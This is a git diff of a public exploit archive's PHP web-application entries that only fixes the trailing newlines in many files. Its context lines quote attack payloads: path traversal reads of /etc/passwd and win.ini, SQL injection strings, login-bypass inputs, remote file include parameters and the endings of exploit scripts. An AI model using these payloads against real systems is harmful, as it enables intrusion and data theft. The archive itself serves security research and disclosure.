+30,4 @@ mode=new&offset=0&active=all¬e= onClick='javascript:document.update_activity.act115.value=this.checked' type=checkbox checked> - - - + \ No newline at end of file diff --git a/platforms/php/webapps/38665.txt b/platforms/php/webapps/38665.txt index 072bf9e3f..083a20b30 100755 --- a/platforms/php/webapps/38665.txt +++ b/platforms/php/webapps/38665.txt @@ -23,4 +23,4 @@ File: document.forms.yeswiki_traversal2_poc.submit(); ---> +--> \ No newline at end of file diff --git a/platforms/php/webapps/3867.pl b/platforms/php/webapps/3867.pl index b5ebcc034..f998fb431 100755 --- a/platforms/php/webapps/3867.pl +++ b/platforms/php/webapps/3867.pl @@ -16,4 +16,4 @@ /theme/acgv.php?rubrik=../../../etc/passwd%00 -# milw0rm.com [2007-05-07] +# milw0rm.com [2007-05-07] \ No newline at end of file diff --git a/platforms/php/webapps/38675.html b/platforms/php/webapps/38675.html index d01d9d494..a23c5119e 100755 --- a/platforms/php/webapps/38675.html +++ b/platforms/php/webapps/38675.html @@ -17,6 +17,4 @@ Magnolia CMS versions 4.5.7, 4.5.8, 4.5.9, 5.0 and 5.0.1 are vulnerable. - - + \ No newline at end of file diff --git a/platforms/php/webapps/38677.txt b/platforms/php/webapps/38677.txt index 5206740c3..5a426e0a1 100755 --- a/platforms/php/webapps/38677.txt +++ b/platforms/php/webapps/38677.txt @@ -50,4 +50,4 @@ Referrer : http://www.example.com/admincp/force_read_thread.php IP Address : Username : n3tw0rk Classname : -MySQL Version : +MySQL Version : \ No newline at end of file diff --git a/platforms/php/webapps/38679.txt b/platforms/php/webapps/38679.txt index 92e2dd621..481c05bb9 100755 --- a/platforms/php/webapps/38679.txt +++ b/platforms/php/webapps/38679.txt @@ -52,6 +52,4 @@ Connection: keep-alive Pragma: no-cache Cache-Control: no-cache -hosts_alive=1&scan_locally=1¬_resolve=0&scan_server=Null&targets=blah - - +hosts_alive=1&scan_locally=1¬_resolve=0&scan_server=Null&targets=blah \ No newline at end of file diff --git a/platforms/php/webapps/3868.txt b/platforms/php/webapps/3868.txt index 40c24fdc7..56fe7e53f 100755 --- a/platforms/php/webapps/3868.txt +++ b/platforms/php/webapps/3868.txt @@ -16,4 +16,4 @@ #Miro_Tiger[at]Hotmail[dot]com -# milw0rm.com [2007-05-07] +# milw0rm.com [2007-05-07] \ No newline at end of file diff --git a/platforms/php/webapps/38683.txt b/platforms/php/webapps/38683.txt index 7474f47ef..f24c2404f 100755 --- a/platforms/php/webapps/38683.txt +++ b/platforms/php/webapps/38683.txt @@ -26,4 +26,4 @@ document.main.submit(); + \ No newline at end of file diff --git a/platforms/php/webapps/38684.txt b/platforms/php/webapps/38684.txt index c765645d2..7f0d1d3cf 100755 --- a/platforms/php/webapps/38684.txt +++ b/platforms/php/webapps/38684.txt @@ -186,4 +186,4 @@ Stored XSS: - + \ No newline at end of file diff --git a/platforms/php/webapps/38688.txt b/platforms/php/webapps/38688.txt index 45cbd8604..7c27bca4b 100755 --- a/platforms/php/webapps/38688.txt +++ b/platforms/php/webapps/38688.txt @@ -151,4 +151,4 @@ The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere. -by hyp3rlinx +by hyp3rlinx \ No newline at end of file diff --git a/platforms/php/webapps/3869.txt b/platforms/php/webapps/3869.txt index f712ee214..b5c2313a5 100755 --- a/platforms/php/webapps/3869.txt +++ b/platforms/php/webapps/3869.txt @@ -14,4 +14,4 @@ #Greetz : â„¢~${{BraveHeart}}$~â„¢ -# milw0rm.com [2007-05-07] +# milw0rm.com [2007-05-07] \ No newline at end of file diff --git a/platforms/php/webapps/38699.txt b/platforms/php/webapps/38699.txt index 94c11df8e..8439a8acc 100755 --- a/platforms/php/webapps/38699.txt +++ b/platforms/php/webapps/38699.txt @@ -129,4 +129,4 @@ The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere. -by hyp3rlinx +by hyp3rlinx \ No newline at end of file diff --git a/platforms/php/webapps/3870.txt b/platforms/php/webapps/3870.txt index 2a2d29ee3..5b892da3e 100755 --- a/platforms/php/webapps/3870.txt +++ b/platforms/php/webapps/3870.txt @@ -70,4 +70,4 @@ __________§§§§§______§§§§§§_________________________ ############################################################################################## ############################################################################################## -# milw0rm.com [2007-05-08] +# milw0rm.com [2007-05-08] \ No newline at end of file diff --git a/platforms/php/webapps/38709.txt b/platforms/php/webapps/38709.txt index 55a2215ad..7cec4fae8 100755 --- a/platforms/php/webapps/38709.txt +++ b/platforms/php/webapps/38709.txt @@ -42,6 +42,4 @@ alert('XSS');
- - - + \ No newline at end of file diff --git a/platforms/php/webapps/38737.txt b/platforms/php/webapps/38737.txt index 2fe8587be..26b9c8405 100755 --- a/platforms/php/webapps/38737.txt +++ b/platforms/php/webapps/38737.txt @@ -10,5 +10,4 @@ Twilight CMS 0.4.2 is vulnerable; other versions may also be affected. nc [www.example.com] 80 GET /..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/windows/win.ini HTTP/1.1 -nc [www.example.com] 80 GET demosite/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/TwilightCMS/Sites/company_site/Data/user list.dat HTTP/1.1 - +nc [www.example.com] 80 GET demosite/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/TwilightCMS/Sites/company_site/Data/user list.dat HTTP/1.1 \ No newline at end of file diff --git a/platforms/php/webapps/3874.txt b/platforms/php/webapps/3874.txt index f251529ac..580bf50a4 100755 --- a/platforms/php/webapps/3874.txt +++ b/platforms/php/webapps/3874.txt @@ -9,4 +9,4 @@ # All Files in : /frm/ & /sql/ & /cns/ # Greetz To: Tryag-Team ...$$ -# milw0rm.com [2007-05-08] +# milw0rm.com [2007-05-08] \ No newline at end of file diff --git a/platforms/php/webapps/38746.html b/platforms/php/webapps/38746.html index 6cab195da..cbd9a522a 100755 --- a/platforms/php/webapps/38746.html +++ b/platforms/php/webapps/38746.html @@ -72,4 +72,4 @@ for (var i = 0; i < 2; i++){ } - + \ No newline at end of file diff --git a/platforms/php/webapps/3875.txt b/platforms/php/webapps/3875.txt index eeceb1258..1f4e945ea 100755 --- a/platforms/php/webapps/3875.txt +++ b/platforms/php/webapps/3875.txt @@ -7,4 +7,4 @@ # Exploit:[Path]/libs/ftp.php?path_local=Shell # Greetz To: Tryag-Team ....## -# milw0rm.com [2007-05-08] +# milw0rm.com [2007-05-08] \ No newline at end of file diff --git a/platforms/php/webapps/38750.txt b/platforms/php/webapps/38750.txt index 212b682a4..e6151a882 100755 --- a/platforms/php/webapps/38750.txt +++ b/platforms/php/webapps/38750.txt @@ -93,4 +93,4 @@ Timeline Solution ================================================================================ -Update to version 1.5.59 +Update to version 1.5.59 \ No newline at end of file diff --git a/platforms/php/webapps/38753.html b/platforms/php/webapps/38753.html index 86d1e65ea..4717d1563 100755 --- a/platforms/php/webapps/38753.html +++ b/platforms/php/webapps/38753.html @@ -198,5 +198,4 @@ Restore Factory Settings - - + \ No newline at end of file diff --git a/platforms/php/webapps/38754.txt b/platforms/php/webapps/38754.txt index 9b7ec1845..0fe9759c6 100755 --- a/platforms/php/webapps/38754.txt +++ b/platforms/php/webapps/38754.txt @@ -19,4 +19,4 @@ name="file" id="file" />


Powered By

+href=http://www.example.com

\ No newline at end of file diff --git a/platforms/php/webapps/3876.txt b/platforms/php/webapps/3876.txt index 5545d2dad..a3ad3eee7 100755 --- a/platforms/php/webapps/3876.txt +++ b/platforms/php/webapps/3876.txt @@ -13,4 +13,4 @@ # Exploit:[Path]/web/lom.php?ETCDIR=Shell # Greetz To: Tryag-Team ....** -# milw0rm.com [2007-05-08] +# milw0rm.com [2007-05-08] \ No newline at end of file diff --git a/platforms/php/webapps/3878.txt b/platforms/php/webapps/3878.txt index 0368d1408..aa78fdcb7 100755 --- a/platforms/php/webapps/3878.txt +++ b/platforms/php/webapps/3878.txt @@ -14,4 +14,4 @@ #Miro_Tiger[at]Hotmail[dot]com -# milw0rm.com [2007-05-08] +# milw0rm.com [2007-05-08] \ No newline at end of file diff --git a/platforms/php/webapps/38780.txt b/platforms/php/webapps/38780.txt index 43ca2c22f..de81f2eb6 100755 --- a/platforms/php/webapps/38780.txt +++ b/platforms/php/webapps/38780.txt @@ -410,6 +410,4 @@ m=1346228457,/framework/thirdparty/jstree/themes/apple/style.css?m=1346228525,/f /framework/admin/css/screen.css?m=1346228456,/framework/css/GridField.css?m=1346228458] Vary[Accept-Encoding] Content-Encoding[gzip] -Content-Length[1309] - - +Content-Length[1309] \ No newline at end of file diff --git a/platforms/php/webapps/38782.php b/platforms/php/webapps/38782.php index fd11b786d..7af6a7c92 100755 --- a/platforms/php/webapps/38782.php +++ b/platforms/php/webapps/38782.php @@ -59,4 +59,4 @@ else die(" [+] Exploit was unsuccessful.\n"); } -?> +?> \ No newline at end of file diff --git a/platforms/php/webapps/38783.php b/platforms/php/webapps/38783.php index 53a3d4b66..36fc64c9a 100755 --- a/platforms/php/webapps/38783.php +++ b/platforms/php/webapps/38783.php @@ -61,4 +61,4 @@ else die(" [+] Exploit was unsuccessful.\n"); } -?> +?> \ No newline at end of file diff --git a/platforms/php/webapps/38785.pl b/platforms/php/webapps/38785.pl index 2cb1f9f54..9de9bf1a2 100755 --- a/platforms/php/webapps/38785.pl +++ b/platforms/php/webapps/38785.pl @@ -139,4 +139,4 @@ exit; } } print "[-] Failed, something went wrong\n"; -exit; +exit; \ No newline at end of file diff --git a/platforms/php/webapps/3879.htm b/platforms/php/webapps/3879.htm index fc0445229..a871c1a89 100755 --- a/platforms/php/webapps/3879.htm +++ b/platforms/php/webapps/3879.htm @@ -71,4 +71,4 @@ RC3(GLOBALS[CHEMINMODULES])Remote File Include Exploit

-# milw0rm.com [2007-05-09] +# milw0rm.com [2007-05-09] \ No newline at end of file diff --git a/platforms/php/webapps/38814.php b/platforms/php/webapps/38814.php index dc72fe2d4..1458f8e4a 100755 --- a/platforms/php/webapps/38814.php +++ b/platforms/php/webapps/38814.php @@ -16,5 +16,4 @@ curl_setopt($ch, CURLOPT_HTTPHEADER, $headers); $postResult = curl_exec($ch); curl_close($ch); print "$postResult"; -?> - +?> \ No newline at end of file diff --git a/platforms/php/webapps/38819.txt b/platforms/php/webapps/38819.txt index 066d89152..2ea3ad3ba 100755 --- a/platforms/php/webapps/38819.txt +++ b/platforms/php/webapps/38819.txt @@ -23,4 +23,4 @@ email='+(SELECT 1 FROM (SELECT SLEEP(25))A)+' http://example.com/login.php (POST - username) -username='+(SELECT 1 FROM (SELECT SLEEP(25))A)+ +username='+(SELECT 1 FROM (SELECT SLEEP(25))A)+ \ No newline at end of file diff --git a/platforms/php/webapps/38820.php b/platforms/php/webapps/38820.php index 3528ba786..f36827019 100755 --- a/platforms/php/webapps/38820.php +++ b/platforms/php/webapps/38820.php @@ -14,4 +14,4 @@ curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $postResult = curl_exec($ch); curl_close($ch); print "$postResult"; -?> +?> \ No newline at end of file diff --git a/platforms/php/webapps/38828.php b/platforms/php/webapps/38828.php index e47961873..97d939f51 100755 --- a/platforms/php/webapps/38828.php +++ b/platforms/php/webapps/38828.php @@ -51,4 +51,4 @@ for($i=0;$i<10;$i++) $FilterBypassing .= '....//'; } -?> +?> \ No newline at end of file diff --git a/platforms/php/webapps/38830.txt b/platforms/php/webapps/38830.txt index caf253f69..1f6dbb2ba 100755 --- a/platforms/php/webapps/38830.txt +++ b/platforms/php/webapps/38830.txt @@ -20,4 +20,4 @@ ###################### # Discovered by : # Mojtaba MobhaM & T3NZOG4N (t3nz0g4n@yahoo.com) -###################### +###################### \ No newline at end of file diff --git a/platforms/php/webapps/38837.txt b/platforms/php/webapps/38837.txt index 060871827..225c7e0b6 100755 --- a/platforms/php/webapps/38837.txt +++ b/platforms/php/webapps/38837.txt @@ -33,5 +33,4 @@ Departement informatique Groupe A mehdi.alouache@hotmail.fr -mehdi.alouache@etu.univ-lehavre.fr - +mehdi.alouache@etu.univ-lehavre.fr \ No newline at end of file diff --git a/platforms/php/webapps/3884.txt b/platforms/php/webapps/3884.txt index b9a33358e..46f84581f 100755 --- a/platforms/php/webapps/3884.txt +++ b/platforms/php/webapps/3884.txt @@ -16,4 +16,4 @@ #Miro_Tiger100[at]Hotmail[dot]com -# milw0rm.com [2007-05-09] +# milw0rm.com [2007-05-09] \ No newline at end of file diff --git a/platforms/php/webapps/38841.txt b/platforms/php/webapps/38841.txt index ad8b90ad9..a9602eb6d 100755 --- a/platforms/php/webapps/38841.txt +++ b/platforms/php/webapps/38841.txt @@ -80,4 +80,4 @@ The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere. -by hyp3rlinx +by hyp3rlinx \ No newline at end of file diff --git a/platforms/php/webapps/38844.html b/platforms/php/webapps/38844.html index cbe34cf32..7043224b2 100755 --- a/platforms/php/webapps/38844.html +++ b/platforms/php/webapps/38844.html @@ -24,4 +24,4 @@ size=.70. value=.http://www.example2.com/code/evil.js. /> - + \ No newline at end of file diff --git a/platforms/php/webapps/38848.php b/platforms/php/webapps/38848.php index 5a45bbc3b..9b75284a8 100755 --- a/platforms/php/webapps/38848.php +++ b/platforms/php/webapps/38848.php @@ -14,4 +14,4 @@ curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $postResult = curl_exec($ch); curl_close($ch); print "$postResult"; -?> +?> \ No newline at end of file diff --git a/platforms/php/webapps/3885.txt b/platforms/php/webapps/3885.txt index 79a374165..e90fc2577 100755 --- a/platforms/php/webapps/3885.txt +++ b/platforms/php/webapps/3885.txt @@ -16,4 +16,4 @@ # Exploit:[Path]/phplib/version/1.3.3/standard/3/lay.php?tt_docroot=Shell # Greetz To: Tryag-Team ....&&& -# milw0rm.com [2007-05-09] +# milw0rm.com [2007-05-09] \ No newline at end of file diff --git a/platforms/php/webapps/38852.pl b/platforms/php/webapps/38852.pl index b9adb7e68..8f3058bfa 100755 --- a/platforms/php/webapps/38852.pl +++ b/platforms/php/webapps/38852.pl @@ -112,4 +112,4 @@ exit(1); else { print "[-] Txt shell not uploaded. :( \n"; -} +} \ No newline at end of file diff --git a/platforms/php/webapps/38855.txt b/platforms/php/webapps/38855.txt index c819dc1a1..1d6b3cbe0 100755 --- a/platforms/php/webapps/38855.txt +++ b/platforms/php/webapps/38855.txt @@ -90,4 +90,4 @@ Timeline Solution ======================================================================== -Upgrade to version 1.5.63 +Upgrade to version 1.5.63 \ No newline at end of file diff --git a/platforms/php/webapps/3886.pl b/platforms/php/webapps/3886.pl index 5406975c4..9b56c20ae 100755 --- a/platforms/php/webapps/3886.pl +++ b/platforms/php/webapps/3886.pl @@ -58,4 +58,4 @@ print "------------------------------------------------------------------------- else {print "\nExploit Failed...\n";} -# milw0rm.com [2007-05-09] +# milw0rm.com [2007-05-09] \ No newline at end of file diff --git a/platforms/php/webapps/3887.pl b/platforms/php/webapps/3887.pl index a33919963..bc9a76a29 100755 --- a/platforms/php/webapps/3887.pl +++ b/platforms/php/webapps/3887.pl @@ -77,4 +77,4 @@ print "------------------------------------------------------------------------- else {print "\n[-] Unable to retrieve admin hash...\n";} -# milw0rm.com [2007-05-09] +# milw0rm.com [2007-05-09] \ No newline at end of file diff --git a/platforms/php/webapps/38875.php b/platforms/php/webapps/38875.php index 034f3543a..29e6ae9f7 100755 --- a/platforms/php/webapps/38875.php +++ b/platforms/php/webapps/38875.php @@ -25,4 +25,4 @@ $postResult = curl_exec($ch); curl_close($ch); print "$postResult"; #----------------------------------------------------------------------------- -?> +?> \ No newline at end of file diff --git a/platforms/php/webapps/38895.txt b/platforms/php/webapps/38895.txt index be9273382..4f68da929 100755 --- a/platforms/php/webapps/38895.txt +++ b/platforms/php/webapps/38895.txt @@ -118,7 +118,4 @@ Connection: Keep-Alive Content-Type: text/html echo "Write PHP WebShell Code"; - - - - + \ No newline at end of file diff --git a/platforms/php/webapps/38902.txt b/platforms/php/webapps/38902.txt index 6e78a54b6..068878dee 100755 --- a/platforms/php/webapps/38902.txt +++ b/platforms/php/webapps/38902.txt @@ -26,4 +26,4 @@ http://localhost/wp-admin/admin-ajax.php?action=pollinsertvalues in post data, add this -question_id=1337 union select group_concat(0x7e,(select(@)from(select(@:=0x00),(select(@)from(information_schema.tables)where table_schema=database() and (@)in(@:=concat(@,0x3C62723E,table_name))))a)),2-- -&poll_answer_securety=4ac4f387e2&date_answers[0]=5 +question_id=1337 union select group_concat(0x7e,(select(@)from(select(@:=0x00),(select(@)from(information_schema.tables)where table_schema=database() and (@)in(@:=concat(@,0x3C62723E,table_name))))a)),2-- -&poll_answer_securety=4ac4f387e2&date_answers[0]=5 \ No newline at end of file diff --git a/platforms/php/webapps/38906.txt b/platforms/php/webapps/38906.txt index 4493a0954..e4b76ccf7 100755 --- a/platforms/php/webapps/38906.txt +++ b/platforms/php/webapps/38906.txt @@ -117,4 +117,4 @@ http://127.0.0.1/c/portal/layout [offset parameter] http://127.0.0.1/c/portal/layout [query parameter] http://127.0.0.1/c/portal/layout [sort parameter] http://127.0.0.1/html/portlet/ext/sitesearch/test_site_search_results.jsp [testIndex parameter] -http://127.0.0.1/html/portlet/ext/sitesearch/test_site_search_results.jsp [testQuery parameter] +http://127.0.0.1/html/portlet/ext/sitesearch/test_site_search_results.jsp [testQuery parameter] \ No newline at end of file diff --git a/platforms/php/webapps/38907.txt b/platforms/php/webapps/38907.txt index 27f3dc5de..2cebb6a5e 100755 --- a/platforms/php/webapps/38907.txt +++ b/platforms/php/webapps/38907.txt @@ -107,5 +107,4 @@ User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept: */* -action=-1%22%20or%2034%20%3d%20%2231&CSRFName=CSRF83497906_1588898183&CSRFToken=dbdd20b65f0a882be3c6629ec1d975be69c2668cdb8e75aa2b5a42f5d031b66cbaf4073567b352024e09fe04ba358c6186d1e58e1493822005a88893363a1f9d&page=login&s_email=sample%40email.tst - +action=-1%22%20or%2034%20%3d%20%2231&CSRFName=CSRF83497906_1588898183&CSRFToken=dbdd20b65f0a882be3c6629ec1d975be69c2668cdb8e75aa2b5a42f5d031b66cbaf4073567b352024e09fe04ba358c6186d1e58e1493822005a88893363a1f9d&page=login&s_email=sample%40email.tst \ No newline at end of file diff --git a/platforms/php/webapps/38927.txt b/platforms/php/webapps/38927.txt index 9097ae8e7..c34212b2a 100755 --- a/platforms/php/webapps/38927.txt +++ b/platforms/php/webapps/38927.txt @@ -45,4 +45,4 @@ http://[TARGET]/admin ID: 'or' 1=1 PW : 'or' 1=1 -############################################################ +############################################################ \ No newline at end of file diff --git a/platforms/php/webapps/3894.txt b/platforms/php/webapps/3894.txt index 76aa3627f..17904ccc5 100755 --- a/platforms/php/webapps/3894.txt +++ b/platforms/php/webapps/3894.txt @@ -5,4 +5,4 @@ # Exploit:[Path]/inc/config.inc.php?x[1]=Shell # Greetz To: Tryag-Team ....** -# milw0rm.com [2007-05-10] +# milw0rm.com [2007-05-10] \ No newline at end of file diff --git a/platforms/php/webapps/3895.txt b/platforms/php/webapps/3895.txt index 641b69b2f..7b957b1d7 100755 --- a/platforms/php/webapps/3895.txt +++ b/platforms/php/webapps/3895.txt @@ -79,4 +79,4 @@ Cookies should be modifiable. If not, crack the md5! http://md5.rednoize.com -# milw0rm.com [2007-05-10] +# milw0rm.com [2007-05-10] \ No newline at end of file diff --git a/platforms/php/webapps/38956.txt b/platforms/php/webapps/38956.txt index 281c07123..68e5d6444 100755 --- a/platforms/php/webapps/38956.txt +++ b/platforms/php/webapps/38956.txt @@ -79,4 +79,4 @@ EXPLOIT Iphobos Blog - + \ No newline at end of file diff --git a/platforms/php/webapps/3896.pl b/platforms/php/webapps/3896.pl index 7776d9f01..7126068e0 100755 --- a/platforms/php/webapps/3896.pl +++ b/platforms/php/webapps/3896.pl @@ -74,4 +74,4 @@ print " ...Silentz\r\n"; print "-------------------------------------------------------------------------\r\n"; } -# milw0rm.com [2007-05-10] +# milw0rm.com [2007-05-10] \ No newline at end of file diff --git a/platforms/php/webapps/38965.txt b/platforms/php/webapps/38965.txt index ac3a6ba2e..9b5673e83 100755 --- a/platforms/php/webapps/38965.txt +++ b/platforms/php/webapps/38965.txt @@ -22,4 +22,4 @@ $getallproducttotal=mysql_num_rows($getallproductresult); 3. POC -http://127.0.0.1/ecommercemajor/productdtl.php?prodid=SQLI +http://127.0.0.1/ecommercemajor/productdtl.php?prodid=SQLI \ No newline at end of file diff --git a/platforms/php/webapps/38981.txt b/platforms/php/webapps/38981.txt index 9119922da..c92542089 100755 --- a/platforms/php/webapps/38981.txt +++ b/platforms/php/webapps/38981.txt @@ -21,6 +21,4 @@ Description: The $GLOBALS['babInstallPath']-parameter isn't declared before requ So an attacker can use this to execute some php-shellcode for example. -### The 27 years old, german hacker bd0rk ### - - +### The 27 years old, german hacker bd0rk ### \ No newline at end of file diff --git a/platforms/php/webapps/38984.txt b/platforms/php/webapps/38984.txt index 7ca6fce3c..760699197 100755 --- a/platforms/php/webapps/38984.txt +++ b/platforms/php/webapps/38984.txt @@ -129,4 +129,4 @@ http://easyhost.me/file.php?file="> ================================================================================ # Discovered By : Ehsan Hosseini (EhsanSec.ir) -================================================================================ +================================================================================ \ No newline at end of file diff --git a/platforms/php/webapps/38986.txt b/platforms/php/webapps/38986.txt index 348d4a32b..1dc3817ca 100755 --- a/platforms/php/webapps/38986.txt +++ b/platforms/php/webapps/38986.txt @@ -16,5 +16,4 @@ Dredge School Administration System 1.0 is vulnerable; other versions may also b Iphobos Blog - - + \ No newline at end of file diff --git a/platforms/php/webapps/38989.txt b/platforms/php/webapps/38989.txt index f25f0bb7d..34ef682ab 100755 --- a/platforms/php/webapps/38989.txt +++ b/platforms/php/webapps/38989.txt @@ -37,6 +37,4 @@ Description: The problem is the same as the first. -.- ### The 27 years old, german hacker bd0rk ### -Greetz: Kacper Szurek, High-Tech Bridge, rgod, LiquidWorm - - +Greetz: Kacper Szurek, High-Tech Bridge, rgod, LiquidWorm \ No newline at end of file diff --git a/platforms/php/webapps/38990.txt b/platforms/php/webapps/38990.txt index 2ce45894d..b6141ff52 100755 --- a/platforms/php/webapps/38990.txt +++ b/platforms/php/webapps/38990.txt @@ -442,6 +442,4 @@ include('obinclude.php'); # Twitter : @ShakeriHassan - Fb.com/General.BlackHat -########################################################## - - +########################################################## \ No newline at end of file diff --git a/platforms/php/webapps/38991.pl b/platforms/php/webapps/38991.pl index f249020f4..a14f0ccad 100755 --- a/platforms/php/webapps/38991.pl +++ b/platforms/php/webapps/38991.pl @@ -83,4 +83,4 @@ sub usage() print "============================================================================\r\n"; exit(); } - + \ No newline at end of file diff --git a/platforms/php/webapps/3900.php b/platforms/php/webapps/3900.php index e9ba16da1..2681a0d49 100755 --- a/platforms/php/webapps/3900.php +++ b/platforms/php/webapps/3900.php @@ -190,4 +190,4 @@ echo "[!] Go To www.".$host.$path."admin/index.php For Login\r\n"; ?> -# milw0rm.com [2007-05-11] +# milw0rm.com [2007-05-11] \ No newline at end of file diff --git a/platforms/php/webapps/3901.txt b/platforms/php/webapps/3901.txt index e25f88c30..6ef77a267 100755 --- a/platforms/php/webapps/3901.txt +++ b/platforms/php/webapps/3901.txt @@ -47,4 +47,4 @@ http://Target.ir/Gallery/phpThumb.php?src=../../../etc/passwd --------------------------------------------------------------------- -# milw0rm.com [2007-05-11] +# milw0rm.com [2007-05-11] \ No newline at end of file diff --git a/platforms/php/webapps/39014.txt b/platforms/php/webapps/39014.txt index e0139c88e..f7f696612 100755 --- a/platforms/php/webapps/39014.txt +++ b/platforms/php/webapps/39014.txt @@ -26,6 +26,4 @@ http://www.example.com/centraladmin.php?process=processuser.> - - - + \ No newline at end of file diff --git a/platforms/php/webapps/3902.txt b/platforms/php/webapps/3902.txt index ba2a224a3..ca83cd14e 100755 --- a/platforms/php/webapps/3902.txt +++ b/platforms/php/webapps/3902.txt @@ -32,4 +32,4 @@ http://Target.ir/gallery/galeria.php?pictures_folder=./example/&lang2=../../../e --------------------------------------------------------------------- -# milw0rm.com [2007-05-11] +# milw0rm.com [2007-05-11] \ No newline at end of file diff --git a/platforms/php/webapps/3903.php b/platforms/php/webapps/3903.php index 9b439a963..94ed40d64 100755 --- a/platforms/php/webapps/3903.php +++ b/platforms/php/webapps/3903.php @@ -371,4 +371,4 @@ Echo "[!] Shell : http://".$host.$path."conf/config.inc.php?shell=Evil Text\r\n" ?> -# milw0rm.com [2007-05-11] +# milw0rm.com [2007-05-11] \ No newline at end of file diff --git a/platforms/php/webapps/39032.txt b/platforms/php/webapps/39032.txt index 2fa9afecd..a68780d6e 100755 --- a/platforms/php/webapps/39032.txt +++ b/platforms/php/webapps/39032.txt @@ -35,4 +35,4 @@ if(file_exists($fileurl)) { EXPLOIT ######### -http://localhost/admin/index.php?mode=settings&page=editor&fileurl=config.php +http://localhost/admin/index.php?mode=settings&page=editor&fileurl=config.php \ No newline at end of file diff --git a/platforms/php/webapps/39033.py b/platforms/php/webapps/39033.py index d208330b3..83c91739a 100755 --- a/platforms/php/webapps/39033.py +++ b/platforms/php/webapps/39033.py @@ -128,4 +128,4 @@ def main(): if __name__ == "__main__": - main() + main() \ No newline at end of file diff --git a/platforms/php/webapps/39034.html b/platforms/php/webapps/39034.html index 084a14040..0ca0329ba 100755 --- a/platforms/php/webapps/39034.html +++ b/platforms/php/webapps/39034.html @@ -61,4 +61,4 @@ value="reset" name="B2" style="float: left">

- + \ No newline at end of file diff --git a/platforms/php/webapps/39057.txt b/platforms/php/webapps/39057.txt index dfb5540f0..a8e8a5cb0 100755 --- a/platforms/php/webapps/39057.txt +++ b/platforms/php/webapps/39057.txt @@ -54,4 +54,4 @@ Parameter: ORDER[] Notes: Requires Authentication Page: /userui/ticket.php?ID=86 Parameter: ID -Notes: Requires Authentication +Notes: Requires Authentication \ No newline at end of file diff --git a/platforms/php/webapps/39059.txt b/platforms/php/webapps/39059.txt index dbae9aea1..5a04c6a60 100755 --- a/platforms/php/webapps/39059.txt +++ b/platforms/php/webapps/39059.txt @@ -29,4 +29,4 @@ An attacker may leverage this issue to upload arbitrary files to the affected co -------------------- Example URI: -------------------- -http://www.example.com/wp-content/plugins/global-flash-galleries/swfupload.php +http://www.example.com/wp-content/plugins/global-flash-galleries/swfupload.php \ No newline at end of file diff --git a/platforms/php/webapps/3906.htm b/platforms/php/webapps/3906.htm index fa703e777..dc8105a33 100755 --- a/platforms/php/webapps/3906.htm +++ b/platforms/php/webapps/3906.htm @@ -78,4 +78,4 @@ frameborder="0"> -# milw0rm.com [2007-05-12] +# milw0rm.com [2007-05-12] \ No newline at end of file diff --git a/platforms/php/webapps/39064.txt b/platforms/php/webapps/39064.txt index 45044bea8..6d528ab6d 100755 --- a/platforms/php/webapps/39064.txt +++ b/platforms/php/webapps/39064.txt @@ -56,4 +56,4 @@ Maian Uploader 4.0 is vulnerable; other versions may also be affected. # don't put ( &height= ) after width Xss and you get error # Notice about ( Undefined index: height ) with the Full Path Dir. # -###################################################################### +###################################################################### \ No newline at end of file diff --git a/platforms/php/webapps/39068.txt b/platforms/php/webapps/39068.txt index 75e0170d1..f8fe8818a 100755 --- a/platforms/php/webapps/39068.txt +++ b/platforms/php/webapps/39068.txt @@ -20,6 +20,4 @@ Description: The $GLOBALS['babAddonPhpPath']-parameter isn't declared before qeq Patch: You can declare the vulnerable parameter or use an alert. -~~Greetz: x0r_32, m0rphin, GoLd_M, zone-h.org-Team~~ - - +~~Greetz: x0r_32, m0rphin, GoLd_M, zone-h.org-Team~~ \ No newline at end of file diff --git a/platforms/php/webapps/39069.pl b/platforms/php/webapps/39069.pl index aca09d00c..d0f39af74 100755 --- a/platforms/php/webapps/39069.pl +++ b/platforms/php/webapps/39069.pl @@ -66,7 +66,4 @@ else print "EXPLOIT FAILURE\n"; exit(1); } -} - - - +} \ No newline at end of file diff --git a/platforms/php/webapps/3907.txt b/platforms/php/webapps/3907.txt index ae7d030c2..fc6037c7c 100755 --- a/platforms/php/webapps/3907.txt +++ b/platforms/php/webapps/3907.txt @@ -29,4 +29,4 @@ Special thx to:by_emr3 , ercu_145, bolivar, voltigore, f10 # ship_country varchar(20) NOT NULL default '', # ship_phone varchar(15) NOT NULL default '', -# milw0rm.com [2007-05-12] +# milw0rm.com [2007-05-12] \ No newline at end of file diff --git a/platforms/php/webapps/3908.txt b/platforms/php/webapps/3908.txt index 033e6a72a..7e453ea08 100755 --- a/platforms/php/webapps/3908.txt +++ b/platforms/php/webapps/3908.txt @@ -14,4 +14,4 @@ POC: http:[target]/[path]/includes/common.php?root_path=ShellCode ----------------------------------------------------------------------------------- -# milw0rm.com [2007-05-12] +# milw0rm.com [2007-05-12] \ No newline at end of file diff --git a/platforms/php/webapps/39083.txt b/platforms/php/webapps/39083.txt index 6a7ec5dea..7dcca7377 100755 --- a/platforms/php/webapps/39083.txt +++ b/platforms/php/webapps/39083.txt @@ -36,4 +36,4 @@ require ( dirname(dirname(__FILE__)).'/language/'.$language.'.php'); ***Greetings fr0m Germany: zone-h.org-Team, exploit-db.com, GoLd_M, Kim Dotcom*** -MERRY CHRISTMAS BRO'S! :) +MERRY CHRISTMAS BRO'S! :) \ No newline at end of file diff --git a/platforms/php/webapps/39088.txt b/platforms/php/webapps/39088.txt index e3474a11f..642e32e43 100755 --- a/platforms/php/webapps/39088.txt +++ b/platforms/php/webapps/39088.txt @@ -33,4 +33,4 @@ Content-Type: application/octet-stream Content-Disposition: form-data; name="Upload" Submit Query -------------ae0cH2Ij5ei4ei4Ef1Ij5Ij5ae0cH2-- +------------ae0cH2Ij5ei4ei4Ef1Ij5Ij5ae0cH2-- \ No newline at end of file diff --git a/platforms/php/webapps/3909.txt 